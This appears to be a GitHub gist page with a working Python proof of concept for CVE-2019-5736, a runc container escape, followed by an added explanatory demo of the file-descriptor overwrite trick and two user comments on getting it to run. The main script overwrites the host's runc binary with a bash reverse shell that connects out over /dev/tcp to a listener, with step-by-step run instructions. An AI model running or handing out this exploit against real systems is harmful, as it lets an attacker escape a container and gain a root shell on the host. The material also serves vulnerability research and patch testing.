@singe
Last active April 30, 2023 06:18
PoC for CVE-2019-5736 in Python
```python
#!/bin/python3
# Silly PoC for CVE-2019-5736 in Python by @singe (with help from @_staaldraad, @frichette_n & @_cablethief)
# Target will need a python3 interpreter
# Edit IP info below, on the host run a netcat to catch the reverse shell
# Run this python file in the container
# Then from the host: docker exec -i <container name> /tmp/evil
#
# Note (see the comments below): runc is dynamically linked, so when it is
# started through /proc/self/exe inside the container its shared libraries
# (libseccomp, libapparmor) must exist in the container image.
import os
import stat

host = '172.17.0.1'
port = '5000'
# Reverse shell that will be written over the host's runc binary
payload = f'#!/bin/bash\necho "exec 5<>/dev/tcp/{host}/{port} && cat <&5|/bin/bash 2>&5 >&5"|/bin/bash\n'
target_file = '/tmp/evil'

if __name__ == '__main__':
    # When "docker exec" runs /tmp/evil, the shebang makes the kernel execute
    # /proc/self/exe of the runc init process, i.e. the host's runc binary,
    # which is then visible from inside the container as /proc/<pid>/exe.
    with open(target_file, 'w') as evil:
        evil.write('#!/proc/self/exe --criu')
    os.chmod(target_file, stat.S_IXOTH)  # any execute bit lets root run it via docker exec

    # Wait for "docker exec" to spawn runc inside the container's PID namespace
    found = 0
    while found == 0:
        procs = os.popen('ps -A -o pid')
        for pid in procs:
            pid = pid.strip()
            if pid == 'PID':
                continue
            if int(pid) > os.getpid():
                try:
                    with open(f'/proc/{pid}/cmdline', 'r') as cmdline:
                        if cmdline.read().find('runc') >= 0:
                            found = pid
                except FileNotFoundError:
                    continue
                except ProcessLookupError:
                    continue

    # O_PATH gives a handle to the runc binary that survives runc exiting
    # (after which /proc/<pid>/exe disappears).
    handle = -1
    while handle == -1:
        try:
            handle = os.open(f'/proc/{found}/exe', os.O_PATH)  # /proc/xxx/exe is fd to runcinit
        except FileNotFoundError:
            continue
        except PermissionError:
            continue
    print('Got file handle')

    # Reopening for write fails with ETXTBSY while runc is still executing;
    # keep retrying until it has exited and the binary is writable.
    write_handle = 0
    while write_handle == 0:
        try:
            write_handle = os.open(f'/proc/self/fd/{str(handle)}', os.O_WRONLY | os.O_TRUNC)
        except OSError:
            continue
    print('Got write handle')

    result = os.write(write_handle, str.encode(payload))
    if result == len(payload):
        print('Successfully wrote payload')
    else:
        print('Could not write')
```
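The descriptor trick the PoC depends on (an O_PATH handle on /proc/<pid>/exe, later reopened for writing through /proc/self/fd/N) is easier to see against a throwaway binary than against runc. The following is an added example written for this page, not code from @singe's gist: it copies the system `sleep` binary (assumed to be present) into a temporary directory as a stand-in for runc, and the `REPLACEMENT` bytes are a constructed placeholder for the reverse-shell payload. It is Linux-only, since it relies on /proc.

```python
#!/usr/bin/env python3
# Added example for this page, not code from @singe's gist. It demonstrates the
# descriptor trick the PoC relies on, against a throwaway copy of the system
# `sleep` binary (assumed to be present) instead of the host's runc:
#
#   1. start a process from a binary we own (stand-in for "runc init");
#   2. open /proc/<pid>/exe with O_PATH, a path-only handle that keeps
#      referring to the binary even after the process exits and
#      /proc/<pid> disappears;
#   3. reopen that handle for writing through /proc/self/fd/<n>: while the
#      binary is still executing the kernel refuses with ETXTBSY, which is
#      why the PoC spins on OSError until runc has exited;
#   4. once the process is gone the same reopen succeeds and the file on
#      disk is overwritten, the window the PoC uses to replace runc.
import errno
import os
import shutil
import subprocess
import tempfile

ETXTBSY = errno.ETXTBSY
# Constructed placeholder for the PoC's reverse-shell payload.
REPLACEMENT = b'#!/bin/sh\necho replaced\n'


def reopen_for_write(path_fd):
    """Upgrade an O_PATH descriptor to a writable one via /proc/self/fd.

    Returns (fd, 0) on success or (-1, errno) on failure.
    """
    try:
        return os.open(f'/proc/self/fd/{path_fd}', os.O_WRONLY | os.O_TRUNC), 0
    except OSError as e:
        return -1, e.errno


def overwrite_window_demo(new_contents=REPLACEMENT):
    """Run the four steps above and report what happened at each one.

    Returns a dict with:
      busy_errno   errno of the write-reopen while the binary ran (ETXTBSY)
      after_errno  errno of the write-reopen after it exited (0)
      wrote        bytes written through the pinned handle
      final        contents of the file on disk afterwards
    """
    workdir = tempfile.mkdtemp(prefix='exe-overwrite-demo-')
    # Keep the name "sleep" so a busybox-style multicall binary still works.
    victim = os.path.join(workdir, 'sleep')
    try:
        shutil.copy(shutil.which('sleep'), victim)
        os.chmod(victim, 0o755)

        proc = subprocess.Popen([victim, '30'])
        try:
            # Popen returns only after the exec has happened, so
            # /proc/<pid>/exe already points at our copy here.
            path_fd = os.open(f'/proc/{proc.pid}/exe', os.O_PATH)
            fd, busy_errno = reopen_for_write(path_fd)
            if fd != -1:  # would only happen if the kernel let us clobber it
                os.close(fd)
        finally:
            proc.kill()
            proc.wait()

        # /proc/<pid>/exe no longer exists, but the O_PATH fd still pins
        # the same inode, so the reopen now goes through.
        fd, after_errno = reopen_for_write(path_fd)
        wrote = 0
        if fd != -1:
            wrote = os.write(fd, new_contents)
            os.close(fd)
        os.close(path_fd)

        with open(victim, 'rb') as f:
            final = f.read()
    finally:
        shutil.rmtree(workdir, ignore_errors=True)

    return {'busy_errno': busy_errno, 'after_errno': after_errno,
            'wrote': wrote, 'final': final}


if __name__ == '__main__':
    r = overwrite_window_demo()
    print('while running:', errno.errorcode.get(r['busy_errno'], r['busy_errno']))
    print('after exit   :', 'errno', r['after_errno'], 'wrote', r['wrote'], 'bytes')
    print('on disk      :', r['final'])
```

Two things this makes visible that the PoC only implies: the `except OSError: continue` loop in the gist is waiting out ETXTBSY, which the kernel returns for any write-open of a file that is currently being executed, and the O_PATH handle has to be taken before runc exits because /proc/<pid>/exe vanishes with the process while the handle keeps pointing at the binary.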
zoobab commented Feb 14, 2019

I ran the script inside a python:3 container, the host being an ubuntu xenial with docker 17.03:

```
$ docker exec -i c9c0f3989fd8 /tmp/evil
/proc/self/exe: error while loading shared libraries: libapparmor.so.1: cannot open shared object file: No such file or directory
```

zoobab commented Feb 14, 2019

I needed to do an apt-get install libseccomp2 libapparmor1 inside the container to solve the error.
